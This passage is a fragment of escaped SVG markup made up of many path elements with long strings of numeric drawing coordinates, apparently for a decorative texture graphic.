d=\"M1463,106.5c-4.5-.1-4.6.2-5.2.4a16.67,16.67,0,0,0,4.7.7c.9-.3-2.5-.4-3.3-.6,3.2.1,5.3.1,5.5-.1C1463,106.8,1463,106.7,1463,106.5Z\"></path>\n <path d=\"M1472.4,99.9c-3-.2-1.8,0-5.7-.1,1,.3,1.1,1.1-3.7.6,6.8,0-.4-.9,3.2-1.1a38.82,38.82,0,0,0,5.9.3c-1.2-.4-.2-.3-4.7-.7,1.8-.3,6.5.4,5.5-.1-.2-.4-4.4,0-3.3-.6,4.3.3,3.6-1-2.5-1.3,0,.5-1.5.6,2.3,1-11.1,1.2-12.1,3.5-6.2,5.5-2.9.1-2.9.4-5.1.5,4.5.8-4.6,2,4.8,2.3-2.8-1,1.5-2.4.9-3.7-.3-.6-4.1-1.4,1.4-1.5-.3.1-1.8.2-1,.4,8.9.1-.5-.8,3.4-.9.9.4,3.9.2,1.9.6,3.8.1,3.5-.1,3.9-.3C1470.8,100.6,1469.7,99.9,1472.4,99.9Z\"></path>\n <path d=\"M1701.7,100a23.82,23.82,0,0,1-2.8-.1,20.27,20.27,0,0,0-2.7,0c-3.3,1.9-8,3.1-7.5,5.7,2.3.2,6.1.3,7.5.6-7.8-.4-.8.9-8.1.3-.7.5-.9.9,2.6,1.4-1.6-.6,3.5-.1,5.6,0-.3-.2,0-.3,1-.4-2.4-.3-6.1-.2-7.3-.4,1.5-.4,4.7-.2,9.3-.4-3.1-.5.2-.5.6-.9-8.1-.2-1.1-.8-5.2-1.2,1.8,0,1.8-.1,4.2,0-2.2-.4-.9-.8.4-1.1-1.7-.1-3.3-.2-4.5-.3C1701.6,102.1,1696.9,100.8,1701.7,100Z\"></path>\n <path d=\"M1710.2,106.5c-3.6-.1-5.3,0-5.3.3,2.6.1,3.1.2,1.6.3,1.4,0,2.8.1,4.2.1C1709.2,106.8,1709.2,106.8,1710.2,106.5Z\"></path>\n <path d=\"M1705,103.8c1.4.4-1.3.5-.6.9C1710.6,104.9,1709.3,103.9,1705,103.8Z\"></path>\n <path d=\"M1697.2,99.7c-.1-.4,2.4-.6,6.4-.6C1698.4,98.6,1692,99.5,1697.2,99.7Z\"></path>\n <path d=\"M1653.7,97.6c1.4.4-5.1.7-.4,1.1C1652.9,98.3,1657.8,98,1653.7,97.6Z\"></path>\n <path d=\"M1326.8,90.8c1.4,0,2.8.1,4.2.1.4-.2,2.7-.5-2-.7C1328.4,90.4,1325.8,90.4,1326.8,90.8Z\"></path>\n <path d=\"M1684,97.3c0,.3.9.6,3.4.7C1686.4,97.8,1689.1,97.3,1684,97.3Z\"></path>\n <path d=\"M1696.1,95.3c10.3.3.8-.7,4.6-1.1C1692.8,94.2,1699.1,94.9,1696.1,95.3Z\"></path>\n <path d=\"M1742,95.2c-1.3.1-2.4.6.7.8C1743.9,96,1745,95.4,1742,95.2Z\"></path>\n <path d=\"M1715.4,93.4c1.1.1,2.8.1,3,.2-1.1,0-1.6.1-1.2.2,3.8.1,3.5-.1,3.9-.3C1717.4,93.4,1716.3,93.1,1715.4,93.4Z\"></path>\n <path d=\"M1742.4,91c.9.2-1.1.5,1.9.6C1746.4,91.5,1748.7,91.1,1742.4,91Z\"></path>\n <path d=\"M1711.2,90.3c2-.1,1.8-.7-3.4-.7C1709.3,89.8,1708.8,90.1,1711.2,90.3Z\"></path>\n <path d=\"M1741.4,88.2c-3.6-.1-5.1.5-2.2.6C1739.7,88.6,1742.4,88.6,1741.4,88.2Z\"></path>\n <path d=\"M1738,87.6a8.94,8.94,0,0,0,3.2.5c.3-.2,1.5-.5-.6-.7A6.92,6.92,0,0,1,1738,87.6Z\"></path>\n <path d=\"M1729.4,85.7c-.9.3,2.5.4,4.7.5C1735.7,85.9,1734.6,85.6,1729.4,85.7Z\"></path>\n <path d=\"M1877.1,86.3c4,.1,3.8-.2,3.7-.5C1876.4,85.7,1876.5,86,1877.1,86.3Z\"></path>\n <path d=\"M1704.4,77.8c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C1708.1,77.7,1703,77.4,1704.4,77.8Z\"></path>\n <path d=\"M1724.7,72.5a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C1726,73.3,1728.1,72.7,1724.7,72.5Z\"></path>\n <path d=\"M1811.9,73.8c0,.2-3.8.8,2.2.9C1813,74.4,1815.2,73.9,1811.9,73.8Z\"></path>\n <path d=\"M1705.8,71.5c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C1715.2,71.8,1705.3,71.2,1705.8,71.5Z\"></path>\n <path d=\"M1801.3,72.8c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C1798.9,73,1802.1,73.1,1801.3,72.8Z\"></path>\n <path d=\"M1719.7,71.5c.2-.2,2.6-.7-1-1.1C1718.2,70.6,1716.4,71.1,1719.7,71.5Z\"></path>\n <path d=\"M1711.3,69.9c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1C1709.6,69.9,1711.4,70,1711.3,69.9Z\"></path>\n <path d=\"M1864.6,72c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C1858.3,72,1866.3,72.5,1864.6,72Z\"></path>\n <path d=\"M1725.4,68.6c.2-.5-1.5-.8-7.8-.9.4.2-.1.4,1.8.5C1723.9,67.7,1721.5,68.5,1725.4,68.6Z\"></path>\n <path d=\"M1814.1,68.4c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C1812.8,68.6,1813.1,68.5,1814.1,68.4Z\"></path>\n <path d=\"M1758.3,63.3c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C1755.2,63.5,1762.2,63.7,1758.3,63.3Z\"></path>\n <path d=\"M1911.3,66.7c3.6-.1,3.2-.7-2.2-.9C1910.8,66.1,1907.6,66.5,1911.3,66.7Z\"></path>\n <path d=\"M1866.7,65a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C1864.3,65.2,1867.5,65.3,1866.7,65Z\"></path>\n <path d=\"M1854.4,63.6c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C1858.8,63.6,1857.5,63.7,1854.4,63.6Z\"></path>\n <path d=\"M1836.4,63.8c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A21.47,21.47,0,0,1,1836.4,63.8Z\"></path>\n <path d=\"M1810.8,61.5c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A27.87,27.87,0,0,0,1810.8,61.5Z\"></path>\n <path d=\"M1865.5,60.5c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.15,41.15,0,0,1,1865.5,60.5Z\"></path>\n <path d=\"M1726.5,52.4c-.3-.4,3.6-.4,5-.7C1725.3,51.5,1722.5,52.1,1726.5,52.4Z\"></path>\n <path d=\"M1768,50.6a4.37,4.37,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C1766.5,50.4,1764.4,50.9,1768,50.6Z\"></path>\n <path d=\"M1743.9,50.1c.4-.3,4.1-.4,3.5-.8C1743.5,49.2,1741.8,49.9,1743.9,50.1Z\"></path>\n <path d=\"M1757.7,48.4c-4.3-.1-5.3.1-8.2.1a10.29,10.29,0,0,0,3.3.6C1753.2,48.8,1758.9,49,1757.7,48.4Z\"></path>\n <path d=\"M1716.4,47.3c-.8.3-1.1,1,5.2,1.2C1719.6,48.1,1718.9,47.7,1716.4,47.3Z\"></path>\n <path d=\"M1708.9,48.2c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C1707.1,48.2,1705.9,48,1708.9,48.2Z\"></path>\n <path d=\"M1777.5,48.8a45.38,45.38,0,0,0,4.9.9C1784.6,49.5,1783.6,48.8,1777.5,48.8Z\"></path>\n <path d=\"M1861.2,50.9c-1.6.1-5.2.1-7,0C1853.6,51.5,1865.8,51.2,1861.2,50.9Z\"></path>\n <path d=\"M1742,48c2.5-.2,5-.1,2.3-.5C1740.8,47.3,1738.8,47.8,1742,48Z\"></path>\n <path d=\"M1786.2,47.8c1,.4,2.4.7,6.4.9C1791.3,48.3,1790.3,48,1786.2,47.8Z\"></path>\n <path d=\"M1746,46.2c.8-.3,1.6-.6-2.1-.8C1745.5,45.8,1740.4,46,1746,46.2Z\"></path>\n <path d=\"M1747.7,43.4c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C1744.5,43.1,1745.6,43.3,1747.7,43.4Z\"></path>\n <path d=\"M1744.9,41.7c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C1749.7,42.1,1747.9,41.8,1744.9,41.7Z\"></path>\n <path d=\"M1685.2,119.2c-.9.1-5.1.4-.8.6-.1-.1,2.4,0,2.6-.2-1.6-.1-2.3-.2-3-.3C1686.3,119.4,1687.7,119.3,1685.2,119.2Z\"></path>\n <path d=\"M1686.5,111.1a45.79,45.79,0,0,1,7.4.5,14.06,14.06,0,0,1-3.6-1C1685.9,110.5,1687.6,111,1686.5,111.1Z\"></path>\n <path d=\"M1699.9,98c-5.9-.4,1.2-.8-5.1-1.1,0,.3,1.9.8-2.2.7a9.4,9.4,0,0,0-3.2-.5c-.3.4,3.6.7,6.1.6.6.2-1.7.2-2.5.3C1695,97.9,1700.4,98.2,1699.9,98Z\"></path>\n <path d=\"M1453.3,87.6c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A7.86,7.86,0,0,1,1453.3,87.6Z\"></path>\n <path d=\"M1744.1,85c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C1742.5,85.3,1748.3,85.2,1744.1,85Z\"></path>\n <path d=\"M1702.2,81.7h0c-9.7.5-1.9,1.9-5.1,2.1,1.6,0,3.3.2,4.9.3a22.85,22.85,0,0,0,3.7,0c-1.6-.1-2.8-.2-3.7-.3-2.9-.4-1.8-1.1,0-1.4a11,11,0,0,1,1.9-.2C1698.9,81.9,1706.6,81.7,1702.2,81.7Z\"></path>\n <path d=\"M1878.8,85c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C1886.6,85.7,1881.6,85.2,1878.8,85Z\"></path>\n <path d=\"M1710.6,81.8c-3-.1-1-.4-1.9-.6C1699.7,80.9,1708.5,82.1,1710.6,81.8Z\"></path>\n <path d=\"M1864.2,74.7c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-7.6.9,3,2.8-3.5,3.8,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.63,41.63,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.15,98.15,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,3.3.1,1.3-.3,4-.2s2.4.6,4.8.8a21.32,21.32,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C1861.8,75.1,1862.3,74.8,1864.2,74.7Z\"></path>\n <path d=\"M0,0V30.7c.9,0,1.9,0,3.1.1l.4.4c13.8.4,10.5-.4,11.6-1,12.1.7,5.8,1.4,4.9,2.4a27.94,27.94,0,0,0,6.9-.1c8.1.9-6.5,1.7,5.1,2.6.3-.3,1.4-.6,3.4-.9.4,2-2.5,2.8,0,4.8-2-.1-2.5-.2-4.4-.3,1,.5,6,.7,6.7,1.2-1.7,0-4-.1-4.1,0,2.2.1,1.2.3.3.3,4.7.2,1.6-.3,5.4-.2,6.6.8.6,1.5,6.4,2.5-4,.1-3.4.6-6.2.8,6.4.3,8.8.1,11.7.6-6.2.1-12.2.4-17-.4.1.2-3.9,0-4.1.1,7.4.1,6.3.8,6.8,1.4,6.2.1,7.2.9,3.5.8,3.1.2,5.3.4,4.8.8-7,.3-7.5-.5-10.2-.6,1.1.3-1,.8,2.3,1,1.2-.6,2.7.6,8.5.2.2-.2-3.3-.2-4.6-.5,5.4.1,7.6.3,8.9.6-1.4.4-10.5.1-12.4.2,2.4.3-2.8.7,3.8,1.2-4.2-.6,1-1.3,7.6-.8.8.5-5.4,0-5.4.2,1.9.3,5.4,1.1-3.6.7,2.4.5,5.6.5,10.1.4,1,.5-4.4.3-6.9.1,1.3.3-2.6.2-2.4.4,4.3.3,7.7,0,11.3.3-.2.2-3.6.1-5.4.2,1.4.4,5.6.7,5.2,1.2-9.4,0,.6.7-7.5.9,3.5.1,4.3-.1,5.8.2-.2.2-5.2,0-5.4.2,3.5.1,6.9.1,7.3.4-.9,0-1.6,0-1.3.1-1.46-.17-2.93-.27-4.4-.3,5.4,1.5,6.2,1.8-3.4,2.4,6.2.3,4.5.9,2.4,1.1,4.4,0,4.5.3,7.3.4-1.9-.6,3.9-.2,6.9-.1,1.8-.4-.6-.6,2-.9-4.5-.1-3.8-.5-6.2-.7,3.2,0,4.6-.2,6.7-.3-3.4-.1-5.3-.9-3.6-1,3.5.2-.1.8,6.3.8-3.2-.6,1.6-.4,4.1,0,.1-1.4.4-1.3-2.2-2.6,3.3,0,6.2.4,8.6.3-7.9-.4,1.2-.9,1.6-1.4.4.2-.1.4,1.8.5,4.2-.1-.6-.3,3.9-.4a8.16,8.16,0,0,0,2.7,0c-4.5-.3-5.6-.2-8.7-.4.4-.9,2.8-2.3,16-2.4-3.9.4,4,1-1.6,1.4,3.4,0,3.3.3,7.2.3,1.8-.6,1.3-1.1,4-1.8a13.45,13.45,0,0,0,4.2,0c-1.7-.1-3.4-.1-3-.3a13.45,13.45,0,0,0,4.2,0c-2.7,0-5-.6-1.9-.6,1.5.7,8.8.3,11.8.8.5.5-8.1.1-5.2.4.8-.1,4.4.2,5.5-.1.9.2,6,.7,2.1.8a44.26,44.26,0,0,0-8.3,0c4.7-.1,8.5.1,11.3.3.3.5,2.4,1.2-3.2,1.1a55.14,55.14,0,0,0-5.9-.4c-1.8.3,4.9.2,4.5.4.4.2-.2.4,1.8.5,3.3-.1-2.8-.5,2.3-.5-.8.4,2.5.5,2.1.8-4.2-.1-4.1.2-8.3,0,.8-.3-5.5-.3-5.8-.2,2.3,0,1.7.8,4.5.4-1.4,0-2-.2-.2-.2.2.2,4,.2,4.4.3-1.5.1-1.4.4-3.8.5-2.3-.1-1.1-.3-3.1-.4-4.8.2,11.3,1.2-.4,1.1-.9-.2,1.2-.5-1.9-.6-4.3.3.3.8-3.2,1.1,3.2,0,5.4.1,5.9.4-4.2-.1-5.4.3-2.2.6-2.7.2-4.7-.2-7,0,3.8.1,3.6.7,4.8.8,0-.1.2-.3,2.6-.2,2.8.3-.9.3.6.7,5.3.2,2-.4,5.2-.4-.9.6,4.4.2,4.3.2,5.7.4-1.8.6-5.1.5,5.5,0,10.2.6,11.3.1-6-.3,2.2-.4-3.5-.8,3.3.1,5.3.1,5.5-.1-3.1-.3-5.9.1-7.3-.4,1.7-.9,14.3.1,13.1.7,2.7-.2,1.8-.2.8-.6,4.9.5,3.1-.1,5.4-.2,3.3.3-.1,1.1,5.3,1.3-.3-.7-1.8-1.4-.1-1.6,7.8.6,4.1,1.4,9,2.3-3.3-.1-5.3-.1-5.5.1,3,.3,2.4.9,5.2,1.2-6.1-.1-2.8.6-2.1.8,1.2-.1,10.6.2,6.8-.2.6.2-4.1-.1-4.3-.2a7,7,0,0,0-1.7-.4c6.7,0,.8-.6,6.4-.6-2.7-.1-3,.1-5.6,0,3.6-1.1,2.1-1.4,3.7-2.1-5.2-.7-7.4-1.9-2.1-2.3a36.81,36.81,0,0,1-4.2-.1c4.8-.1.5-.5.5-1,2.7,0,6.1.1,5.4-.2-6.8,0-4.7-.6-1.9-.6a15.66,15.66,0,0,1-2.9-.2c4,0,5.7.7,7.3.4-3-.1-.8-.5-4.7-.5-.8.1-2.9.1-5.5.1-.3-.3-.5-.6-.8-.9-4.9.1-7.9-.3-9.6.1,3.4.1,2.9-.1,7,0-.2.3,1.2,1-4.9.8,4.4.1-2.6,1.2,4.9.9,0,.2-.6.4-2.4.4-4.5,0-6.7-.2-10-.3a19.29,19.29,0,0,1-3.7.6c-.2-.2-4-.2-4.4-.3,1.6-.2-4.6-.6-.5-.6,2.7.1,1.3.4,4.5.4-.4-.3,4.2-.2,2.2-.7-7.8-.4-10.8-2-1.4-1.6-3.2-.6-2.8-.8-7.4-.5,2.5-.4.2-1.1-3.7-1.1,2.7,0,.7-.3,4-.2,2.9.1-.3.6,4.7.7,4.1.1-1.9-.8,2.2-.7-.2.3,5.6.2,4.6.5-4.3-.3-4.6.1-2.4.4-2.7-.3-4.9-.1-4,.2a36.19,36.19,0,0,1,8.7.4c-.6-.7,1.3-1.3,1.2-1.8-.5.2-3.1-.4-6-.5-2.6-.9,3.7-.9,1.2-1.8,2.4.4,5.6-.1,7.2.3-4.3-.1-3.3.8-2.1.8a15.37,15.37,0,0,1,2.8.1c-5.2-1.2,11.7-1,9.7,0a52.3,52.3,0,0,0-5.6,0c1.1.3-1.6.7,3.4.7-3-.9,6.9-.1,10.6-.6-.7-.1-6.1-.1-7.4-.5,3.4-.2,8.1.3,9.8.1-2-.4-6.1-.3-8.8-.5.5-.4,4.6-.6,6.9-.1-.5-.3.3-.4,2.3-.5.1.1,2.6.2,3.1.3.2,1-.3,1.7-1.5,2.4.8-.1,2.1-.1,2.2.1-.1.3-1.4.5-3.7.6,5.7.1,3.2.1,3.1.4,2.7.1,3-.1,5.6,0,.4.7,4.7,1.3,0,1.5a82.23,82.23,0,0,0-11.1,0c-5.7-.9,2-1.7-.7-2.3-3.4.1-2.3.7-6.3.7-.4-.8,7-.9,7.1-1.4a73,73,0,0,0-12,.6c-8.2,0-2.8-1-11-1.4,1.3.6,3.9,1.3,10,1.9-6.8.2-5.2.7-7.2,1.3,5.5-.1.8-.3,8.4.1,1.7-.2-4-.5-.4-.4s2.8.6,6.3.8c-2.3.2-2.9.3-.8.6,3.4.1,5.3-.5,9.7,0-3.8.4.5.2,2,.7-1.3.3-4.8-.1-5.3.3,4.5,0,8.1.8,4.9.9-2.7-.1-1.3-.4-4.3-.2,6.3.5,1.5.8,7.8.9-4.2.4,2,.7-1.8,1.2,3.7.2,4.4,0,5.8.2-4.6.2,6.1.7.8.9-.3-.1,0-.3-1.7-.4,2,.7-5.3-.1-5.3.3,9.2.5,10.2,2.1-3,1.4,1-.2-1.8-.7-3.1-.4,2.1.1,1.5.3,1.8.5,7.2.4,11.5.7,7.9,1.1-1.6-.1-6.9-.6-8.6-.3,7,.2-1.4.4-.8.6a53.87,53.87,0,0,1,8.8.5c2.1,0,5.4-.4,6.8-.2.1.3-2.3.3.5.6-1.9,0-3.8-.1-5.7-.1,8.3,1.1,3.6,1.5,2.1,2.3,5.1.2.2.4,3.3.6a13.76,13.76,0,0,1,4.1-.1c1.5.5-6.6.4-2,.9-3.2-.1-5.3-.1-5.5.1,5.4.1,1.4.5,7.3.4-2.8.2.7.4,2,.7,4.9-1.5-2.8-3.3,4.1-4.8a36.81,36.81,0,0,1-4.2-.1c-.9-.5,4.3-.6,1.8-1.2-6.7-.2,1.3.4-2.5.3-5.1-.5-2.2-.8-2.6-1.4a43.87,43.87,0,0,0,5.5-.1c-.8.4-6.2.4-.6.8-.5-.3,3.8-.6.7-.9,1.2-.1,1.3-.3-.4-.5.1.3-4.7-.1-4.4-.2,2.8-.3-3.1-.7,2.1-.7.5.4-.6.8,4.9.9-.1-.7-1.3-1,1.7-1.3-3.1,0-4.6-.2-4.5-.4,7.5-.2-1.9-1.3-4.2-1.6,3.7-.1,5.6-.3,7.9-.5a36.81,36.81,0,0,1-4.2-.1c0-.3,3.3-.4,5.1-.5-7.7-.2-3-.4-6.4-1,2,.1,2.5.2,4.4.3.6-.4-2.7-1.1.3-1.2a33.79,33.79,0,0,1,4.5.3c1.4-.1.1-.4,4-.2-1.5-.2-1-.6-3.4-.7-3,.1-2.7.6-7.9.5,1.7-.4,2.9-.1-1.8-.5,4.1,0,4.6-.5,8.4.1-.2-.3-1.4-.7,2.3-.6,1.3.3,3.4.5,3.5.8a43.14,43.14,0,0,1,8.8.5c1.9-.3-1.5-.6-4.9-.9a13.45,13.45,0,0,1-4.2,0c1.9-.2-1.8-.4,2.4-.5-2.1-.1-5.2-.1-5.8-.2.6-.1,1.3-.2,2.5-.3,8.9.5,11.6,1.1,12.7,1.8,2.1.1,7.2,0,7.2.3-1.9,0-1.1.2-2.6.2-4.9,0-7.5-.4-8.4-.1,15.2.5,10.2,1.8,7.5,2.2-.1.3,3.8-.2,4.4.2-.7.4-3.7.9-1.7,1.3-1.6,0-4.1-.1-4.1,0,10.7.6-1.5,1.9,3.5,2.4-.2-.1.4-.3,1.3-.1.5.4-7,0-6.6.4,3.4.2,5.8-.3,7,0-4.7.1.2.1,1.8.5-3,.1-2.2.6-5.2.4,10.3,1-1.4,1.7.7,2.4-5.3-.1-5.1.3-6.4.6,5.3.2,2.2-.5,6.6-.4-1.7,1,5.6,2.5,10.1,3.6-3.8,0-3.1-.3-5.9-.4-.7.4,5.6.4,6.2.7-5.7.4-13.7.9-4.1,1.7.1-.2-.9-.4,1-.4.2.3,7.9,1.3,1.4,1.6-2-.2-5.4-.2-6-.5,1.8,0,2.4-.2,2.4-.4-4.4,0-4-.4-7.4-.5-1.7.4,4.1.3,3.3.6-3.9-.1-3-.2-5.7-.1,3.3.2,4.4,1,7.7.8-6,.2,3.5,1.2-2.9,1.5-3.6-.2,3.3-.5-3.3-.6-.8.2-.5.6.8.9,6.3.2-1.3-.2,2.6-.2,6.2.1,5.4,1.2,9.2,1-6-.8-.1-1.5-5.7-1.8,3.7-.2,4.2-.6,9.1-.7.1.4.8.3,2.3,1-4.2,0-13.5.6-2,.8-1.5-.4.9-.5,3.8-.5-3.1.3,4.8.6.8.9,6.3.1.8-.9-1-1.1,1.8,0,2.1.2,4.4.2-3.6-1.5.8-2.2,5.5-3.3-7.3-.2-4,.6-10.6.5-.1-.1-1.3-.2-1.6-.3,4.5.1,4.5-.3,3.6-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.5-.6.8-1.1-3.9-1.3,2.9.1-3.7-.8.7-.7.9.1,4.7.5,5.8.2-4.4-.3-4.7-.8-5.3-1.3a53.22,53.22,0,0,0,6.8-.2c-2.5-.4-6.4.1-8.6-.3,5.5-.1.3-1,7.4-1.1-3.6,0-5.2-.2-4.6-.4,1.7.1,9.6.4,5.7.1-5.1,0-4.2-.9-.7-.8-.2.9,8.5.6,10.9,1.3a24.32,24.32,0,0,1-2.7,0c-2.8-.1-2.1-.3-5.9-.3-.3.5-3.8.4.8.9a45.4,45.4,0,0,1-6.9.1c-.2.4,7,.4,7.6.7.3.3-2.2.3-.8.6-1.4,0-2.8-.1-4.2-.1,3.2.6-.3.2,4.9.9-1.5.4-5.5.4-9.4.3,1.2.2,7.9.1,8.7.4.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c4.6.2,4.2-.1,7.1.2-4.9-1.3,3.4-2.1-2.9-3.2,1.6-.1,3.7-.1,7,0-1.5-.6-2.7-1.1-4.5-.4-.9-.2-2.3-.3-3.2-.5,6.2.1,6.6-.4,2.3-.5,5,.1-3.3-.4,1.1-.3,4.4-.1,3.8.6,6.5,1,3.9-.3-1.6-1.2-2.9-1.7,6.4.6-.6-.8,3.5-.8,2.4.1,3.5.8,6,.5-4.7-.5-2.6-1-9.7-1.5,9.2-.4-10.1-2.1,1.8-2.7-4.4-.3-2.6-.8-.9-1,3.2.1-.2.6,6.1.6-.8-.4-3-.7-6.3-.9.2-.2,3.6-.1,3.9-.3-2.6-.1-5.4-.7-3.3-.6,1.7.1,1.7.2,1.7.4a29.51,29.51,0,0,0,5.4-.2c-2.1-.1-5.2-.1-5.8-.2a76.33,76.33,0,0,0,12.9-1.1c-7.2-.2,2.2-.6-6.2-.7,0,.4,4.5,1.1-.9.5-3.2.2,2.6.7-.6.9-.9,0-1.9,0-2.9-.1-1.2-.6,6.9-.8,1.5-1.5-.1.1.5.3-1.1.3-.1-.1-1.3-.2-1.6-.3.4-.2,5.4,0,3.9-.3-7.6.2-.1-1.1-10.9-1.3,5.1-.1-1.1-.2-.6-.7a24.32,24.32,0,0,1,2.7,0c2.6.1,5.3.7,7.3.4-3.5-.1,0-.7-4.8-.8,1.2.2-2.4.4-2.6.2-1.8-.5,8.2-.3,2.1-.8a8.77,8.77,0,0,1-2.8,0c4.1-.4.9-.9,1.6-1.4,2.1.3,2.2.8,6.5,1-1.4-.5.1-.7,3.5-.8-5.1-.2-7,.1-8.6-.3,4.2.1,1.1-.6,5.1-.5-4.8.1-7.6-.5-8.6-.3,5.3.4-3.5,0-2.6.2,2.3,0,2.8.7.5.6.4-.3-3.5-.9-4.7-.7,3.5.1.6.4-1.1.3-3.3-.3.4-.3-.6-.7-2.7-.2-4.5.2-5.7-.1.6-.6,4.6-1,1.1-1.9,3.8.5,5.1-.5,8.3,0-2,.2-3.5.8,2.4,1.1-2-.6-3.2-1.6,1.2-1.8,2.1.7,1,.8-1.7,1.3,7.7.1,9.3.4,17.3.7.8-.3-4.6-.9-4.9-.8-1.6.2,5.9.5,1.8.5a36,36,0,0,1-7.6-.7c4.5-.1.6-.4,2.1-.8,5.7.3,2.7-.2,5.4-.2,2.8.3.4.3.5.6,8.8.1-.3-.4-.7-.8,2.5,0,4.4.1,5.8.2a9.4,9.4,0,0,0-3.2-.5c-1.5.5-12.5-.4-10.5-.9a54.5,54.5,0,0,1,7,0c.1-.2-1.8-.3-1.8-.5,5.1.1,3.5-.4,8.1-.3-2-.5-.4-.5-4.8-.8-4.1,0-.1.4-2.5.4-2.2-.1-5.6-.7-2-.7,4.6.1,7.7.5,8.3,0-7.3.1-1.1-.2-4.5-.4a87.83,87.83,0,0,1-9.6.1c-1.1-.7,1.9-.8,1.7-1.2,1.8.3,1.6.8,5,1,4.9-.4-3.4-1.4,2.8-1.6-3.5.4,3.8.5,6.3.9,1.7-.2,4.5.3,5.6,0a41.63,41.63,0,0,1-6-.5c4.4,0,6-.5,9.5-.2-2.3-.6-8.7-1.4-.2-1.8,1.5.2-3.9.3.4.4a3.3,3.3,0,0,1,1.4,0c.8.3-6.5-.2-4,.2,7.2.3,6.1,1.1,9.8,1.6-3.9-.2-2.6.2-4,.2,3.4-.1,3.9.6,5.8.2-5.3-.3,2.2-.3.9-.5-6.7-.3,1.5-.7-3.9-1.3,2.1.1,5.2.1,5.8.2-.4.1-3.1.3.4.4.2-.3,1.9-.4.7-.7-2.5,0-3.4-.2-3.1-.4a42.45,42.45,0,0,1-7.3-.4c4.4,0,6,.4,7,0-6.1-.3-10.4-.7-14.8-1.1a37.36,37.36,0,0,0,5.5-.1,4,4,0,0,0,1.6.3c-1.9-.6,4.9.3,5.5-.1-9.7-.4-2.6-.4-9.2-1,4.7.2,3,.2,5.6,0,.7.6.3.1,4.3.2.1.1,1.3.2,1.6.3-4.1-.3-3.5.4-1,.4a83,83,0,0,1,8.5.2,36.57,36.57,0,0,0-8-1.2c.8-.5,1.5-.9,7.8-.6.5.3-2.9.2-3.9.3,3.9.5,5.4,1,8.2,1.4-2.5-.4,5.9-.2,5.6,0-1.6.3-5.8.7-.7.7-7.8,0-4,.8-10.4.7-.3.4,3.9.5,6.2.7-3.6-.1-1.9.4-3.8.5a38.81,38.81,0,0,0-6.9.1c4.4.1-2,.7,1.8.5.6-.1,1.3-.2,2.5-.3-.4.3,2.4.5,3.4.7,4.8.2,1.8-.4,8.2-.1-.6.2-.3.4-2.4.5-1.1-.3-2.5.2-5.5.1,2.2.5.4.5,1,1.1,7.5.2.4-.5,2-.9,10.8.2,9-.7,17.4-.7-1.7-.4-6.7-.5-2-.7-2.3-.1-4.7-.1-7.1-.2-.4.3,4.6.3,3.4.7a17.57,17.57,0,0,1-3.9.4,30,30,0,0,1-3.6-1c4.5.1,1.7-.4,4.3-.4-8.9,0-4.1.8-12.1,1,1.8-.5,2.6-1.3,12.5-1.6-.5-.2-2.3,0-2.9-.2,1.4,0,1.6-.2-.2-.2.9.2-3.3.5-4,.2,1.8-.2,1.7-.7,4.9-.8,2.9.1,1.7.4,4.6.5.6-.1,1.8-.2,2.5-.4-2.8-.1-9.4-.5-4.8-.7,2.7.7,2.1-1,9.3-.4-.8-.3-4.8-.4-3.5-.8,6.2.4,2.4-.1,5.4-.2,3.2,1.3,6.6,3.1-2.7,3.2,1.8.7,1,1,2.7,1.5,1.9,0,3.2.1,4.3.2-.5-.4,6-.1,6.6-.4-4.1,0-6.9,0-8.5-.2.9-.3-4.8-.7-.7-.8,1.7.2,1.9.4,2,.7,5.3,0,11.5-.5,7.4-1,.1.3.2.6-3.8.5.7-1.4-7.4-3.4,9.8-3.1-5.5-.3,7.8-.3.7-.7-1.4.1-.1.4-4,.2-1.1-.5-.4.1-4.3-.1a5,5,0,0,1-.6-.7c-6.1-.2-4.2.4-9.4.3,3.8-.7,20.4-1.5,5.1-2.1,0-.1-.1-.1-.2-.2,3.4-.1,6.2.5,7.1.2-2.2-.1-4.6-.3-4.6-.5,6.3.2-1.7-.6,2.1-.7,6.8.6,6.8,1.5,6.1,2.2,1.6.1,2.3.2,3,.3,5.